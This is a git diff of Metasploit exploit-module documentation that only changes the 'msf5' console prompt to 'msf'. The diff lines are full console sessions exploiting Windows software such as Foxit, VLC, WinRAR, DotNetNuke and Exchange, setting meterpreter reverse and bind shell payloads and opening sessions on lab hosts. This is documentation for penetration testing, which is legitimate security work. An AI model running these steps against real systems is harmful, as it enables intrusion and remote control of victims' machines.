b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md index 04342505c2..aa7b48a355 100644 --- a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md +++ b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md @@ -34,16 +34,16 @@ ### Documalis Free PDF Editor v5.7.2.26 on Windows 10 x64 v2004 ``` -msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 0 +msf > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 0 TARGET => 0 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 6655 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 6655 LPORT => 6655 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner): @@ -73,18 +73,18 @@ Exploit target: -- ---- 0 Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit [+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf [*] Started bind TCP handler against 172.26.215.55:6655 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler -msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler +msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(multi/handler) > set LPORT 6655 +msf exploit(multi/handler) > set LPORT 6655 LPORT => 6655 -msf5 exploit(multi/handler) > set RHOST 172.26.215.55 +msf exploit(multi/handler) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.215.55:6655 [*] Sending stage (176195 bytes) to 172.26.215.55 @@ -118,16 +118,16 @@ meterpreter > ### Documalis Free PDF Scanner v5.7.2.122 on Windows 10 x64 v2004 ``` -msf5 > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 1 +msf > use exploit/windows/fileformat/documalis_pdf_editor_and_scanner +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set TARGET 1 TARGET => 1 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 7788 +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > set LPORT 7788 LPORT => 7788 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > show options Module options (exploit/windows/fileformat/documalis_pdf_editor_and_scanner): @@ -158,18 +158,18 @@ Exploit target: 1 Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > exploit [+] msf.pdf stored at /home/gwillcox/.msf4/local/msf.pdf [*] Started bind TCP handler against 172.26.215.55:7788 -msf5 exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp +msf exploit(windows/fileformat/documalis_pdf_editor_and_scanner) > use multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp -msf5 exploit(multi/handler) > set RHOST 172.26.215.55 +msf exploit(multi/handler) > set RHOST 172.26.215.55 RHOST => 172.26.215.55 -msf5 exploit(multi/handler) > set LPORT 7788 +msf exploit(multi/handler) > set LPORT 7788 LPORT => 7788 -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started bind TCP handler against 172.26.215.55:7788 [*] Sending stage (176195 bytes) to 172.26.215.55 diff --git a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md index 2c18a103d3..b3ab0992a2 100644 --- a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md +++ b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md @@ -47,21 +47,21 @@ Note: The last make_nops will offset the location of the payload. The offset is ### Dup Scout Enterprise v10.4.16 Windows 7 SP1 x64. ``` -msf5 > use exploit/windows/fileformat/dupscout_xml -msf5 exploit(windows/fileformat/dupscout_xml) > set payload windows/meterpreter/reverse_tcp +msf > use exploit/windows/fileformat/dupscout_xml +msf exploit(windows/fileformat/dupscout_xml) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(windows/fileformat/dupscout_xml) > set lhost 172.22.222.120 +msf exploit(windows/fileformat/dupscout_xml) > set lhost 172.22.222.120 lhost => 172.22.222.120 -msf5 exploit(windows/fileformat/dupscout_xml) > run +msf exploit(windows/fileformat/dupscout_xml) > run [*] Creating 'msf.xml' file ... [+] msf.xml stored at /home/msfdev/.msf4/local/msf.xml -msf5 exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 172.22.222.120 +msf exploit(multi/handler) > set lhost 172.22.222.120 lhost => 172.22.222.120 -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.22.222.120:4444 [*] Sending stage (179779 bytes) to 172.22.222.122 diff --git a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md index b05b8e8581..6a061e1365 100644 --- a/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md +++ b/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md @@ -40,20 +40,20 @@ share => tmp lhost => 172.22.222.197 [*] share_path: \\172.22.222.197\tmp\tmp.exe [+] test.pdf stored at /home/msfdev/.msf4/local/test.pdf -msf5 exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler -msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +msf exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > set lhost 172.22.222.197 +msf exploit(multi/handler) > set lhost 172.22.222.197 lhost => 172.22.222.197 -msf5 exploit(multi/handler) > set exitonsession false +msf exploit(multi/handler) > set exitonsession false exitonsession => false -msf5 exploit(multi/handler) > run -j +msf exploit(multi/handler) > run -j [*] Exploit running as background job 0. [*] Started reverse TCP handler on 172.22.222.197:4444 [*] Sending stage (179779 bytes) to 172.22.222.200 [*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.200:49673) at 2018-08-21 07:50:34 -0500 -msf5 exploit(multi/handler) > sessions -i 1 +msf exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo diff --git a/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md b/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md index b827679908..6a163b1b82 100644 --- a/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md +++ b/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md @@ -41,19 +41,19 @@ Windows Contacts 1. Configure the module-specific settings. ``` -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com +msf exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com WEBSITE => metasploit.com -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith +msf exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith FILENAME => John Smith ``` 2. Configure the payload. ``` -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148 +msf exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148 LHOST => 192.168.1.148 -msf5 exploit(windows/fileformat/microsoft_windows_contact) > run +msf exploit(windows/fileformat/microsoft_windows_contact) > run [+] Creating 'John Smith.zip' ``` diff --git a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md index 97a58d1d7f..3da29c6465 100644 --- a/documentation/modules/exploit/windows/fileformat/vlc_mkv.md +++ b/documentation/modules/exploit/windows/fileformat/vlc_mkv.md @@ -22,10 +22,10 @@ This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Wind ### Windows 10 x64 running VLC 2.2.8 (x64) ``` -msf5 > use exploit/windows/fileformat/vlc_mkv -msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 +msf > use exploit/windows/fileformat/vlc_mkv +msf exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 lhost => 172.22.222.134 -msf5 exploit(windows/fileformat/vlc_mkv) > run +msf exploit(windows/fileformat/vlc_mkv) > run [+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv [*] Created tjub-part1.mkv. Target should open this file @@ -33,9 +33,9 @@ msf5 exploit(windows/fileformat/vlc_mkv) > run [*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv [*] Appending blocks to tjub-part1.mkv [+] Successfully appended blocks to tjub-part1.mkv -msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444 +msf exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444 [*] Payload handler running as background job 0. -msf5 exploit(windows/fileformat/vlc_mkv) > +msf exploit(windows/fileformat/vlc_mkv) > [*] Started reverse TCP handler on 172.22.222.134:4444 [*] Sending stage (336 bytes) to 172.22.222.200 [*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500 diff --git a/documentation/modules/exploit/windows/fileformat/winrar_ace.md b/documentation/modules/exploit/windows/fileformat/winrar_ace.md index 9a99e7bfa6..7f890f6f31 100644 --- a/documentation/modules/exploit/windows/fileformat/winrar_ace.md +++ b/documentation/modules/exploit/windows/fileformat/winrar_ace.md @@ -39,13 +39,13 @@ Optional. A list of other files to be included in the resulting ACE archive. The ### Test with autogenerated payload, no additional files in archive Output from Metasploit: ``` -msf5 exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.72.1 +msf exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.72.1 LHOST => 172.16.72.1 -msf5 exploit(windows/fileformat/winrar_ace) > exploit +msf exploit(windows/fileformat/winrar_ace) > exploit [*] Payload filename: sGrBPr.exe [+] msf.ace stored at /home/msfdev2/.msf4/local/msf.ace -msf5 exploit(windows/fileformat/winrar_ace) > +msf exploit(windows/fileformat/winrar_ace) > ``` Verify checksums using `acefile`: @@ -101,18 +101,18 @@ msfdev2@automata:~$ Output from Metasploit: ``` -msf5 exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe +msf exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe CUSTFILE => /home/msfdev2/abcdef.exe -msf5 exploit(windows/fileformat/winrar_ace) > set FILENAME msf2.ace +msf exploit(windows/fileformat/winrar_ace) > set FILENAME msf2.ace FILENAME => msf2.ace -msf5 exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 +msf exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 LHOST => 172.16.79.1 -msf5 exploit(windows/fileformat/winrar_ace) > exploit +msf exploit(windows/fileformat/winrar_ace) > exploit [*] Using a custom payload: abcdef.exe [*] Payload filename: abcdef.exe [+] msf2.ace stored at /home/msfdev2/.msf4/local/msf2.ace -msf5 exploit(windows/fileformat/winrar_ace) > +msf exploit(windows/fileformat/winrar_ace) > ``` Verify checksums using `acefile`: @@ -185,21 +185,21 @@ msfdev2@automata:~$ Output from Metasploit: ``` -msf5 exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe +msf exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe CUSTFILE => abcdef.exe -msf5 exploit(windows/fileformat/winrar_ace) > set FILE_LIST /home/msfdev2/ace_files.txt +msf exploit(windows/fileformat/winrar_ace) > set FILE_LIST /home/msfdev2/ace_files.txt FILE_LIST => ace_files.txt -msf5 exploit(windows/fileformat/winrar_ace) > set FILENAME custom.ace +msf exploit(windows/fileformat/winrar_ace) > set FILENAME custom.ace FILENAME => custom.ace -msf5 exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 +msf exploit(windows/fileformat/winrar_ace) > set LHOST 172.16.79.1 LHOST => 172.16.79.1 -msf5 exploit(windows/fileformat/winrar_ace) > exploit +msf exploit(windows/fileformat/winrar_ace) > exploit [*] Using the provided list of files @ /home/msfdev2/ace_files.txt... [*] Using a custom payload: abcdef.exe [*] Payload filename: abcdef.exe [+] custom.ace stored at /home/msfdev2/.msf4/local/custom.ace -msf5 exploit(windows/fileformat/winrar_ace) > +msf exploit(windows/fileformat/winrar_ace) > ``` Verify checksums using `acefile`: @@ -279,4 +279,4 @@ header ntsecurity b'' reserved2 b'' msfdev2@automata:~$ -``` \ No newline at end of file +``` diff --git a/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md index 9673672ae2..2f8a367ebb 100644 --- a/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md +++ b/documentation/modules/exploit/windows/fileformat/zahir_enterprise_plus_csv.md @@ -22,7 +22,7 @@ Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vuln ### Zahir Enterprise 6 build 10b on Windows 10 x64 ``` -msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) > +msf exploit(windows/fileformat/zahir_enterprise_plus_csv) > [*] Started reverse TCP handler on 172.22.222.130:4444 [*] Sending stage (179779 bytes) to 172.22.222.200 [*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500 diff --git a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md index 6d2f2a000c..bdfa99f151 100644 --- a/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md +++ b/documentation/modules/exploit/windows/http/apache_activemq_traversal_upload.md @@ -24,7 +24,7 @@ This module exploits CVE-2015-1830 by attempting to upload a JSP payload to a ta ## Scenarios ``` -msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options +msf exploit(windows/http/apache_activemq_traversal_upload) > show options Module options (exploit/windows/http/apache_activemq_traversal_upload): @@ -50,7 +50,7 @@ Payload options (java/jsp_shell_reverse_tcp): SHELL no The system shell to use. -msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit +msf exploit(windows/http/apache_activemq_traversal_upload) > exploit [*] Started reverse TCP handler on 192.168.1.1:4444 [*] Uploading payload... diff --git a/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md b/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md index 5bba4a3480..be4c6b4c3b 100644 --- a/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md +++ b/documentation/modules/exploit/windows/http/desktopcentral_deserialization.md @@ -48,10 +48,10 @@ seconds, on a fresh install and calibrated to my test environment. ### Desktop Central 10.0.465 x64 on Windows 10 ``` -msf5 > use exploit/windows/http/desktopcentral_deserialization -msf5 exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp +msf > use exploit/windows/http/desktopcentral_deserialization +msf exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/http/desktopcentral_deserialization) > options +msf exploit(windows/http/desktopcentral_deserialization) > options Module options (exploit/windows/http/desktopcentral_deserialization): @@ -85,11 +85,11 @@ Exploit target: 2 PowerShell Stager -msf5 exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139 +msf exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139 rhosts => 172.16.249.139 -msf5 exploit(windows/http/desktopcentral_deserialization) > set lhost 172.16.249.1 +msf exploit(windows/http/desktopcentral_deserialization) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(windows/http/desktopcentral_deserialization) > run +msf exploit(windows/http/desktopcentral_deserialization) > run [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md index b4286fe9a1..713c60afad 100644 --- a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md +++ b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md @@ -33,8 +33,8 @@ No additional options #### Getting a meterpreter session ``` -msf5 exploit(windows/http/dlink_central_wifimanager_rce) > -msf5 exploit(windows/http/dlink_central_wifimanager_rce) > exploit +msf exploit(windows/http/dlink_central_wifimanager_rce) > +msf exploit(windows/http/dlink_central_wifimanager_rce) > exploit [*] Started reverse TCP handler on 192.168.1.222:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md index 92834909a9..c8b5cc81f4 100644 --- a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md +++ b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md @@ -187,13 +187,13 @@ The expected structure includes a "type" attribute to instruct the server which Here's showing the expected output: ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... @@ -201,7 +201,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [*] 192.168.31.131:8083 - The target appears to be vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. @@ -224,16 +224,16 @@ The expected structure includes a "type" attribute to instruct the server which Here's showing the expected output ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8084 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE Amop-0Et1fM_ - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-2 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8084 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE Amop-0Et1fM_ + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-2 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... @@ -241,7 +241,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [*] 192.168.31.131:8084 - The target appears to be vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. @@ -270,17 +270,17 @@ The expected structure includes a "type" attribute to instruct the server which Here's the expected output: ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8085 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE xR9oL8FP2eE_ - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-3 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 20FED393A44F86138D9089074C819880222A494155CEFAC6FEAF2B3B5204A227625654D87EA48ECB1E509664A7E8E32644BD363D3E6FD3A3273B245EF2D10B5E13D7912B - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8085 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE xR9oL8FP2eE_ + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0-3 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 20FED393A44F86138D9089074C819880222A494155CEFAC6FEAF2B3B5204A227625654D87EA48ECB1E509664A7E8E32644BD363D3E6FD3A3273B245EF2D10B5E13D7912B + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Trying to determine DNN Version... [*] Checking version at /Documentation/License.txt ... @@ -288,7 +288,7 @@ The expected structure includes a "type" attribute to instruct the server which [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [+] 192.168.31.131:8085 - The target appears to be vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. @@ -317,23 +317,23 @@ The expected structure includes a "type" attribute to instruct the server which Here's the expected output: ``` - msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8090 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE /dnn930rc_verification_codes.txt - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0- - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 306A9A382E32E420739C589CCD5C44A7C2595A7163D3340DF4AD71D4223AFC6866E823F36C6171F84FD7352E6BEB17D66B9823567557988321A0867C7038FF6B0F5B0C1F943CBBDAC0B2EE3E - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set TARGET 4 - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > check + msf > use exploit/windows/http/dnn_cookie_deserialization_rce + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8090 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_CODE /dnn930rc_verification_codes.txt + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set VERIFICATION_PLAIN 0- + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set ENCRYPTED true + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set SESSION_TOKEN 306A9A382E32E420739C589CCD5C44A7C2595A7163D3340DF4AD71D4223AFC6866E823F36C6171F84FD7352E6BEB17D66B9823567557988321A0867C7038FF6B0F5B0C1F943CBBDAC0B2EE3E + msf exploit(windows/http/dnn_cookie_deserialization_rce) > set TARGET 4 + msf exploit(windows/http/dnn_cookie_deserialization_rce) > check [*] Checking for custom error page at: /__ ... [+] Custom error page detected. [+] 192.168.31.131:8090 - The target is vulnerable. - msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > exploit + msf exploit(windows/http/dnn_cookie_deserialization_rce) > exploit [*] Checking for custom error page at: /__ ... [+] Custom error page detected. diff --git a/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md b/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md index b133586b55..385112bde5 100644 --- a/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md +++ b/documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md @@ -50,20 +50,20 @@ Password to log in with For example: ``` -msf5 > use exploit/windows/http/exchange_ecp_viewstate -msf5 exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129 +msf > use exploit/windows/http/exchange_ecp_viewstate +msf exploit(windows/http/exchange_ecp_viewstate) > set RHOSTS 192.168.159.129 RHOSTS => 192.168.159.129 -msf5 exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe +msf exploit(windows/http/exchange_ecp_viewstate) > set USERNAME msflab.local\\jdoe 